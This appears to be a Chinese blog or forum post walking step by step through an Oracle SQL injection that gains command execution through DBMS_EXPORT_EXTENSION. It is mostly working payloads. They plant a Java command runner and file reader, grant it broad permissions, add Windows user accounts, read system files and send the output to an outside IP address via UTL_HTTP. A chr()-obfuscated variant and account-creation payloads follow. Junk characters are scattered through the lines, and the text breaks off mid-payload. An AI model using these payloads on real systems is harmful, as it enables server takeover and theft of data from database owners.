
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
. @3 b; _8 U7 O2 D5 Q$ K+ pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 S, s, \2 U3 D- Y& ?create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
6 ~2 a. D+ w3 znew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 r0 P, [! _* l5 |9 S}'''';END;'';END;--','SYS',0,'1',0) from dual
' @; W3 C3 D5 ?  V* ~* g' [7 F) 3 T+ B( r  G0 `- `" M
------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||( ' d3 f3 z/ q; U7 k' G( N5 N% ]1 K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" l3 D) j* g  @5 Wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
. B7 |8 K7 ^7 {) @- }3 [8 h) B( tnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
+ J* P6 O, @1 U2 `2 c}'''';END;'';END;--','SYS',0,'1',0) from dual
- ]# |8 }& @& k)
" z1 o- E1 O5 M5 U8 S& k3 l& x同时把后面步骤 提到的 对readFile()的处理语句去掉。
4 P1 w0 G9 y4 G1 P9 q------------------------------
2.赋 Java 权限
  r5 M' k3 ^- a: tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 O; m  U) ]8 X0 \7 H  T
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  E: q( u$ P! I( `create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual' s. K* n2 j: D: \" p! p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& B" f% r* C& s; `; U  W& d; Fcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋 public 执行函数的权限
, R0 Z" Z( F# s1 E  x+ U. V6 Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
+ e+ }& U6 w* w$ ?) ]1 Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual. p( r0 K8 g% T: o
5.测试上面的几步是否成功
and '1'<>'11'||(
select OBJECT_ID from all_objects where object_name = 'LINXRUNCMD'
( ?9 ?$ {$ a) z# n)
$ W, m9 p7 s; Y0 z6 M5 wand '1'<>(
select OBJECT_ID from all_objects where object_name = 'LINXREADFILE'
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( 3 v; ^& ~2 t3 d5 a2 K8 ]
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 q" Y! K% G. {
' {0 v5 D* f% h# O- g9 Q" e5 F- {) 8 p' v( U; D- l1 {' M+ m5 R
/xxx.jsp?id=1 and '1'<>( * _, F6 }% p5 F8 n! {" n; s: F
select  sys.LinxReadFile('c:/boot.ini') from dual
! ~) f2 g. P  o# H
# p) X+ k8 r& w& @' E  z0 S/ })* w% h  W* F4 f8 A; n9 ~
  
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual/ h$ ]( P, s% G! w  G
或者 UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>( / ?$ h1 {8 Y. y! S5 ~1 V
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
) S! ^+ W5 N4 B3 w0 i6 v- I) $ \' u7 j9 h+ j. x# C& n+ }
/xxx.jsp?id=1 and '1'<>(
9 j! Z* R) g+ y% g3 N1 pSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual' Y1 m- f! @5 y2 a, }6 K- u
) 5 e7 E& G) }* R4 t& O( p' q; @, ~
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
' d; u# b0 \2 I3 a  X& f: }--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变(管理员排查时也可据此发现被注入创建的 Java 源和函数):
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7.删除我们创建的函数
: o3 t- P' C- }( S1 E# F  ]. O/ Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ m; v4 ]. [5 tdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ( Q' \9 j6 W# i; K9 ^
====================================================
全文结束。谨以此文赠与我的朋友。
linx
) T- n, K! l* y3 W3 i! M1 V# @6 d+ i124829445
  ^; m/ a1 u4 E+ }8 J0 J, r2008.1.12
1 k- N$ f7 |( h8 M" elinyujian@bjfu.edu.cn
# F% s+ k8 q# |% J. M* a======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号:
) I8 B: i2 J! h* Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^! y* e% D( j+ k) \- r1 jCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
1 [& \0 g+ Y' w. I; vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
# f6 ^% j# b( g" A0 X; rchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
select user_id from all_users where username = 'LINXSQL'
)
给 linxsql 连接权限:
4 C1 h8 y* I8 {( L) i) y2 l5 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 D( g7 V+ h8 l
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 o  t# i$ g% |" w  }3 Q
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', W4 e; J5 n5 C# ^; ^( k
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 R5 v) ?5 b5 O" w. R======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1"。但权限是继承的,可能仅仅是 public 权限,作用似乎不大;真的要用的话可以考虑 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>(
7 s6 E1 ~+ N6 @+ t2 Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 z: ^* C0 f  `( p  ?create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual( _8 l) J- E/ `( ^" g, U8 U
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
( U# X* S3 l. R9 O1 B9 l) L  } )- X# ^, N& G2 Y8 p# ]: J6 Q
- X4 ]7 l- t/ E  u% H5 v

) L) u/ l- N4 L0 p1 q) }. f1 c+ [& l6 c) p2 m' u6 T